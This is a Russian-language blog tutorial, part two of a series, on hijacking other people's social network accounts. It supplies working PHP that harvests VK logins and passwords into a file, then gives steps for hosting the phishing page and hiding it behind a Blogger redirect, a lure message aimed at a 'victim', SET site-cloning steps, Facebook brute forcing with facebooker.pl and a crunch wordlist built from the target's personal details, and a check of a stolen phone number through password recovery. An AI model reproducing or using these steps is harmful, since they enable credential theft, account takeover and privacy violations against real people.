Получение доступа к аккаунту социальной сети. Часть вторая

31.07.2018

Сегодня мы продолжим изучать такую тему как "Получение доступа к аккаунту социальной сети". В прошлой части мы остановились на создании фишинга.

В этой части мы закончим создание нашего фишинг - сайта и приступим к разбору остальных тем которые более интересны.

Что же, а теперь создайте файл logs.php с таким содержимым:

<?php
$login = $_POST['email'];
$pass = $_POST['pass'];
$file = fopen("my_pass.txt", 'at');
fwrite($file,"Login --> $login\nPass --> $pass\n-----\n");
fclose($file);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vk.com'></head></html>";
?>

Файл test_fish.html , после того как пользователь введет данные, отправит их в logs.php

Этот файл запишет данные в файл my_pass.txt и перенаправит пользователя обратно на сайт вконтакте. Чтобы создать такой скрипт обратите внимание на атрибут method, а вернее на его значение. В моем случае данные переданы методом post. Также обратите на значение атрибута name. У вконтакте это email и pass. То есть если вы увидите примерно такой код

<form method = 'GET' action = 'http://mysite/login.php'>
<label> Login:</label>
<input type = "text" name = "login" />
<label> Password:</label>
<input type = "password" name = "passwd" />
<input type = "button" />
</form>

То начало нашего скрипта logs.php выглядело бы так

<?php
$login = $_GET['login'];
$pass = $_GET['passwd'];
.....

Наконец мы дошли до финальной части создания фишинга. Осталось закинуть все созданные файлы на хостинг.

В этом вам может помочь программа FileZilla(это на случай если вы любите простые вещи). Название сайта лучше создавать не похожее на название социальной сети. Часто из-за этого некоторые хостинги блокируют ваш фишинг. В итоге мы получаем вот это

И после ввода некоторых данных убеждаюсь в стабильной работоспособности фишинга

Практически всегда, если отправить пользователю чисто ссылку на фишинг то социальная сеть заблокирует ссылку. Есть много способов для обхода блокировки, но я для примера опишу вам лишь один.

  • Регистрируем аккаунт в blogger.com(не реклама) --> создаем свой блог.
  • Переходим к пункту Шаблон --> Изменить html.
  • Сократите ссылку на ваш фишинг. Далее добавим следующий код перед тегом <head>

<meta content='0; url=сокращенная_ссылка' http-equiv='Refresh'/>

Теперь осталось сохранить.

В конце концов применим социальную инженерию. Здесь как раз таки понадобится информация которую мы собрали ранее. Напишем все той же "жертве" из примера что-то такое:

Привет!
Недавно открыли фанфик. Там Сверхестественное выходит с крутой озвучкой
Держи <ССЫЛКА>

Setoolkit - фреймворк предназначенный для тестирования на проникновение и основанный на социальной инженерии.
На видео я выбрал следующие пункты

set> 1
set> 2
set:webattak> 3
set:webattak> 2

#Далее вводим имя вашего хоста
#И url сайта который будем клонировать

Остается только сократить ссылку на получившийся фишинг, дать ее "жертве" и мониторить то что выведет set.

Brute Force

Очень сильно уязвим к подбору пароля - facebook. Я создал аккаунт в facebook и оставил много информации. Сегодня мы опираясь на эту информацию попробуем составить базу паролей и применим один старый скрипт для проведения brute force.

Вот внешний вид профиля

Как я говорил ранее, будем записывать полученную информацию. Первое что бросается в глаза - это имя и фамилия. Смотрим далее и видим этот пост, сразу предполагая род деятельности
Как я говорил ранее, будем записывать полученную информацию. Первое что бросается в глаза - это имя и фамилия. Смотрим далее и видим этот пост, сразу предполагая род деятельности

Просмотрев далее я нашел номер телефона пользователя. Проверив его на принадлежность к аккаунту начинаю брутить. Для этого понадобится скрипт facebooke

Распаковываем и далее пишем

chmod +x facebooker.pl
./facebooker <login> <wordlist>
Как видим на скрине, спустя некоторое время мы нашли пароль в простенькой базе.
Как видим на скрине, спустя некоторое время мы нашли пароль в простенькой базе.

Как создать базу:

После того как вы собрали информацию и поискав в топ базах не нашли пароля. То можно создать свою базу основываясь на собранной информации. Также в этом вам может помочь crunch. Создание своей базы может отнять уйму времени.

К примеру я создаю базу на пользователя имя которого Саня. Еще я предполагаю что Саня не такой умный и его пароль состоит из его имени и набора цифр. Тогда я получаю следующую команду

crunch 10 10 -t sanya.%%%% >> baza.txt

Эти 4 цифры могут быть какой-то определенной датой, как раз таки пройдемся по ним.
Повторяюсь, на создание своей базы можно убить очень много времени.

Как проверить принадлежность номера:
Помните в прошлой части я писал что при общении с "жертвой" мне удалось выудить много информации в числе которой был номер телефона?

Так вот давайте узнаем является ли этот номер логином данной страницы или нет.

Для примера снова вернусь к вконтакте. Переходим по "Забыли пароль"(мобильной версии). Пишем номер который удалось узнать и фамилию пользователя. Если пользователь с такими данными имеется, то ясно дело что номер который мы вводили ранее привязан к данной странице.

Значит что тот номер который я выудил привязан к странице данного пользователя.

А если не получилось, то постарайтесь узнать нет ли у данного пользователя фейка.

А на этом часть 2 подошла к концу. До встречи в следующей части.